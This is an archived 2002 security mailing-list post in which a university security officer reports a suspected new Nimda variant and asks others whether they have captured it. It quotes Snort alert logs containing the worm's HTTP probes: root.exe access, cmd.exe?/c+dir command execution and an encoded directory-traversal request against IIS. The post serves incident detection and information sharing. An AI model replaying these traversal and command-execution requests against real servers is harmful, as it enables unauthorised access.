Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

New nimda variant?

From: Russell Fulton <r.fulton () auckland ac nz>
Date: 01 May 2002 12:07:14 +1200
Over the last few days I have been seeing increasing numbers (now up to
3 or 4 per hour) of nimda like attacks against web servers.

Unlike nimda, which normally does 15 probes, this new variant only does
4 probes, as illustrated in these snort logs:

[**] WEB-IIS CodeRed v2 root.exe access [**]
04/30-21:13:15.039903 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x7E
64.252.104.224:3817 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29214
IpLen:20 DgmLen:112 DF
***AP*** Seq: 0x4262A517  Ack: 0x6CBA93E  Win: 0x4248  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F  GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54  t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77  P/1.0..Host: www
0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63  ..Connnection: c
6C 6F 73 65 0D 0A 0D 0A                          lose....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

[**] WEB-IIS cmd.exe access [**]
04/30-21:13:19.727331 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x86
64.252.104.224:3905 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29884
IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x42AA87EB  Ack: 0x67C77D4  Win: 0x4248  TcpLen: 20
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73  GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] WEB-IIS cmd.exe access [**]
04/30-21:13:20.547883 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x86
64.252.104.224:4080 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30005
IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x43380090  Ack: 0x74BEA3A  Win: 0x4248  TcpLen: 20
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73  GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS _mem_bin access [**]
04/30-21:13:23.055837 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0xAB
64.252.104.224:4197 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30401
IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x4394DC62  Ack: 0x76C208B  Win: 0x4248  TcpLen: 20
47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E  GET /_mem_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E  %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31  xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43  .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73  onnnection: clos
65 0D 0A 0D 0A                                   e....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Has anyone caught one of these in a honey pot? If it really is something
new then the Anti Virus vendors need to know about it...

-- 
Russell Fulton, Computer and Network Security Officer
The University of Auckland,  New Zealand


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: